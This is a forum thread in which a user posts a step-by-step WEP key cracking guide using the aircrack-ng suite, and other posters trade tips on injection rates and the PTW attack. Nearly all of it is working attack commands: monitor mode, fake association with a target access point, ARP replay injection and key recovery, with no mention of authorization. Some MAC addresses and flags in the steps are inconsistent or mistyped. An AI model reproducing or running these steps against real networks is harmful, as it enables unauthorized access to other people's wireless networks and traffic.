My wep tutorial

[-`Joseph`-]

When I do not things repeatedly I normally forget how to do them. So I typed up the steps I take when cracking wep.


Wep Cracking Guide
Before attempting to follow this tutorial please update your aircrack to the newest dev version.



1. Put your card into monitor mode and listen on the correct channel
airmon-ng start wlan0 6
start This will put your card into monitor mode.
wlan0 This is your wireless card's name.
6 Is the channel that your target ap broadcasts.

2. Start airodump-ng to capture packets.
airodump-ng wlan0 -c 6 --bssid 00:11:22:33:44:55 -w output
wlan0 Is your wireless card's name
-c 6 Designates which channel airodump should listen for packets on. This should be the same channel as your target ap.
--bssid 00:11:22:33:44:55 Designates the mac address of your target ap.
-w output Is the file where all the packers will be saved and output is the name. The files will appear as output-1.cap output-2.cap etc.

3. Associate with the target ap.
aireplay-ng -1 60 -q 10 wlan0 -e test -a 00:11:22:33:44:44 -h 00:11:22:33:44:55 -o 1
-1 60 Tells the card to fake associate with the target ap and reassociate every 60 seconds.
-q 10 Tells the card to send keep-alive packets every 10 seconds.
wlan0 Is the name of your wireless card's interface.
-e Tells the card which ap to target, if the ap has spaces in it surround it with quotations. ie "test ap"
-a Tells the card the mac address of the ap to target.
-h Tells the card the mac address of the wireless card you are using.
-0 1 Tells the card to send 1 packet at a time.

4. Find your card's maxium bitrate.
aireplay-ng -9 -B wlan0
-9 This tests your card to see if it can inject.
-B performs bitrate test.
wlan0 Is your wireless card's name.

5. Set your card's bitrate so you get the most pps (packets per second)
iwconfig wlan0 rate 54M
wlan0 Is your wireless card's name.
rate 54 Sets your bitrate, 54 is the highest. you want to put the highest number that you succesfully got on the bitrate test.

6. Use ARP replay on the target ap to get ivs.
aireplay-ng -3 wlan0 -b 00:11:22:33:44:55 -h 00:11:22:33:44:55 -x 100
-3 Is the standard ARP replay attack.
wlan0 Is your wireless card's name.
-b 00:11:22:33:44:55 The mac address of your target ap.
-h 00:11:22:33:44:%5 The mac address of your wireless card.
-x 100 The rate of packet injection. (The higher the better, but some aps will disassociate with you if it is too high)

7. Crack the wep key of your target ap.
aircrack-ng -b 00:11:22:33:44:55 output*.cap
-b 00:11:22:33:44:55 Is the mac of your target ap. (aircrack-ng searches through the airodump files for packets matching this mac)
output*.cap This is the name of the file aircrack-ng will search through for packets. (The * tell aircrack-ng to use any file with the prefix of output)


Thanks to the aircrack-ng dev team for this great program, and darkAudax for all his wonderful entries in the aircrack-ng wiki.

[Baxter]

Welcome to the Forum!!
Good start for you with the tut!
step 6 with -x 100, i use -x 1000. my card likes the overdose of packets, once it comes down it gets in a mood.

[-`Joseph`-]

I normally leave it at however fast my card can get, but when the ap can't handle it and it dissociates I have to reduce the packets some. Btw, thanks for the welcome! :-)

[Baxter]

i only associate once, it seems to do the trick. i know what ya mean about different PPS. best results for me is 1000.
step 7, have a look for the new aircrack-ng or aircrack-ptw. you'l get the key faster with less packets.

[-`Joseph`-]

I have the newest version of aircrack-ng, the dev version. The ptw attack on wep is now default. I crack my weps with 10k-40k ivs. I normally get dissociated with the AP because my pps is so high so I have to make sure my card keeps trying to associate and then lower my pps so my card stays associated.

[balding_parrot]

i only associate once, it seems to do the trick. i know what ya mean about different PPS. best results for me is 1000.
step 7, have a look for the new aircrack-ng or aircrack-ptw. you'l get the key faster with less packets.

The default for the latest dev versions is to use a ptw attack, you now use a switch to not use ptw
Off the top of my head it's -z
I think

[Baxter]

i know, but i still like using ptw.

[shamanvirtuel]

now you just use
aircrack-ng to launch ptw attack wich is now default
aircrack-ng -K allow the old standard attack....

the -z not longer exist in newer devs...

[yugioh]

Joseph,

In your initial post (step-by-step guide) you have not used the KISMET.
Is that not needed with your guide? or am I missing something?

Thanks,

[shamanvirtuel]

i never use kismet for wep cracking....
airodump is enough...really....